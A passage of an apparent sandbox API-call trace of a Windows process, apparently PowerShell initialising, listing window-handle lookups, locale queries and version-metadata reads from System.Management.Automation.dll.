	[0849.973] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1554
	[0849.974] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1674
	[0849.974] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1520
	[0849.974] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x14bc
	[0849.974] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xf8c
	[0849.974] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xe9c
	[0849.974] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1434
	[0849.974] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x14ec
	[0849.974] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xfcc
	[0849.975] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x12ac
	[0849.975] GetWindow (hWnd=0x1062e, uCmd=0x4) returned 0x0
	[0849.976] IsWindowVisible (hWnd=0x1062e) returned 0
	[0849.976] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1484
	[0849.976] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x934
	[0849.976] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xc0c
	[0849.977] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xb08
	[0849.977] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x948
	[0849.977] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1178
	[0849.977] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x13e0
	[0849.977] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xcd0
	[0849.977] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x13fc
	[0849.977] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xdc8
	[0849.977] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xc18
	[0849.978] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xc2c
	[0849.978] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xa1c
	[0849.978] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1244
	[0849.978] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xdb0
	[0849.978] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1398
	[0849.978] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1358
	[0849.978] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1370
	[0849.978] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1340
	[0849.979] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x130c
	[0849.979] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x12c0
	[0849.979] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x12e4
	[0849.979] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1270
	[0849.979] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1298
	[0849.979] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x120c
	[0849.979] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x122c
	[0849.979] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x11c4
	[0849.980] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x11b0
	[0849.980] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1188
	[0849.980] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1148
	[0849.980] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1160
	[0849.980] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x10fc
	[0849.980] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xe34
	[0849.980] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xea4
	[0849.980] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x514
	[0849.981] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xe48
	[0849.981] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xbc8
	[0849.981] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xdf8
	[0849.981] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x318
	[0849.981] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xcac
	[0849.981] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x8bc
	[0849.981] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xf9c
	[0849.981] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xf48
	[0849.982] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xe40
	[0849.982] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xecc
	[0849.982] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xeb8
	[0849.982] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xe80
	[0849.982] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xe98
	[0849.982] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xe60
	[0849.982] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xee4
	[0849.982] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xf00
	[0849.983] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xdf0
	[0849.983] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xe1c
	[0849.983] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xdd0
	[0849.983] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xd94
	[0849.983] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xd74
	[0849.983] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xd00
	[0849.983] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xcd8
	[0849.983] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xc84
	[0849.984] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xca4
	[0849.984] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xc64
	[0849.984] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xc24
	[0849.984] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xb84
	[0849.984] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xbac
	[0849.984] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x384
	[0849.984] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xab8
	[0849.986] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x33c
	[0849.986] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xa44
	[0849.986] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xa64
	[0849.986] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x8a8
	[0849.987] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xaf0
	[0849.987] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x88c
	[0849.987] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xb04
	[0849.987] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x910
	[0849.987] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x230
	[0849.987] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xac0
	[0849.987] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xab4
	[0849.987] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xaac
	[0849.988] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x3d0
	[0849.988] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x978
	[0849.988] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xa7c
	[0849.988] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x59c
	[0849.988] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xa88
	[0849.988] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xa6c
	[0849.988] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xa68
	[0849.988] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x9f8
	[0849.988] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xa04
	[0849.989] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x924
	[0849.989] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x8dc
	[0849.989] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x7dc
	[0849.989] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x768
	[0849.989] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x764
	[0849.989] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x820
	[0849.989] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x810
	[0849.989] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x794
	[0849.989] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x83c
	[0849.989] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x7ac
	[0849.990] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xb44
	[0849.990] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x6bc
	[0849.990] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xb5c
	[0849.990] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x838
	[0849.990] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.990] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.990] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.990] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.990] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.990] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.991] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.991] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x4d0
	[0849.991] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x818
	[0849.991] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x5b8
	[0849.991] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x494
	[0849.991] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x1ec
	[0849.991] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x440
	[0849.991] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x7e8
	[0849.991] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x730
	[0849.991] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x2c8
	[0849.992] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x31c
	[0849.992] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x330
	[0849.992] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x128
	[0849.992] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x5c8
	[0849.992] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x6f8
	[0849.992] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x358
	[0849.992] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0x73c
	[0849.992] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1ed840 | out: lpdwProcessId=0x1ed840) returned 0xb0
	[0849.997] WerSetFlags () returned 0x0
	[0851.830] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0851.830] CoTaskMemFree (pv=0x0) 
	[0851.831] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1edba8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1edba0 | out: pulNumLanguages=0x1edba8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1edba0) returned 1
	[0851.831] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1edba8, pwszLanguagesBuffer=0x2d85d60, pcchLanguagesBuffer=0x1edba0 | out: pulNumLanguages=0x1edba8, pwszLanguagesBuffer=0x2d85d60, pcchLanguagesBuffer=0x1edba0) returned 1
	[0851.837] CoTaskMemAlloc (cb=0x24) returned 0x3db270
	[0851.837] GetUserDefaultLocaleName (in: lpLocaleName=0x3db270, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0851.842] CoTaskMemFree (pv=0x3db270) 
	[0853.915] CoTaskMemAlloc (cb=0x104) returned 0x3de0a0
	[0853.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3de0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.915] CoTaskMemFree (pv=0x3de0a0) 
	[0853.918] CoTaskMemAlloc (cb=0x104) returned 0x3de0a0
	[0853.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3de0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.918] CoTaskMemFree (pv=0x3de0a0) 
	[0853.923] CoTaskMemAlloc (cb=0x104) returned 0x3de0a0
	[0853.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3de0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.923] CoTaskMemFree (pv=0x3de0a0) 
	[0853.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0853.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0853.934] SetErrorMode (uMode=0x1) returned 0x1
	[0853.934] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ed820 | out: lpFileInformation=0x1ed820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0853.935] SetErrorMode (uMode=0x1) returned 0x1
	[0853.935] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1eda90 | out: lpdwHandle=0x1eda90) returned 0x94c
	[0854.996] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d895f0 | out: lpData=0x2d895f0) returned 1
	[0854.997] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1eda08, puLen=0x1eda00 | out: lplpBuffer=0x1eda08*=0x2d8968c, puLen=0x1eda00) returned 1
	[0854.997] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x2d89768, puLen=0x1ed970) returned 1
	[0854.997] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0854.997] CoTaskMemAlloc (cb=0x2e) returned 0x3da570
	[0854.997] lstrcpyW (in: lpString1=0x3da570, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0854.997] CoTaskMemFree (pv=0x3da570) 
	[0854.997] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x2d897bc, puLen=0x1ed970) returned 1
	[0854.998] lstrlenW (lpString="System.Management.Automation") returned 28
	[0854.998] CoTaskMemAlloc (cb=0x3c) returned 0x344d00
	[0854.998] lstrcpyW (in: lpString1=0x344d00, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0854.998] CoTaskMemFree (pv=0x344d00) 
	[0854.998] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x2d89818, puLen=0x1ed970) returned 1
	[0854.998] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0854.998] CoTaskMemAlloc (cb=0x20) returned 0x3db2d0
	[0854.998] lstrcpyW (in: lpString1=0x3db2d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0854.998] CoTaskMemFree (pv=0x3db2d0) 
	[0854.998] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x2d89858, puLen=0x1ed970) returned 1
	[0854.998] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0854.998] CoTaskMemAlloc (cb=0x44) returned 0x344d00
	[0854.998] lstrcpyW (in: lpString1=0x344d00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0854.998] CoTaskMemFree (pv=0x344d00) 
	[0854.998] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x2d898c0, puLen=0x1ed970) returned 1
	[0854.998] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0854.998] CoTaskMemAlloc (cb=0x76) returned 0x36ef40
	[0854.998] lstrcpyW (in: lpString1=0x36ef40, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0854.998] CoTaskMemFree (pv=0x36ef40) 
	[0854.998] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x2d8995c, puLen=0x1ed970) returned 1
	[0854.998] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0854.998] CoTaskMemAlloc (cb=0x44) returned 0x344d00
	[0854.998] lstrcpyW (in: lpString1=0x344d00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0854.998] CoTaskMemFree (pv=0x344d00) 
	[0854.998] VerQueryValueW (in: pBlock=0x2d895f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x2d899c0, puLen=0x1ed970) returned 1
	[0854.998] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0854.998] CoTaskMemAlloc (cb=0x58) returned 0x32cda0
	[0854.998] lstrcpyW (in: lpString1=0x32cda0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0854.998] CoTaskMemFree (pv=0x32cda0) 
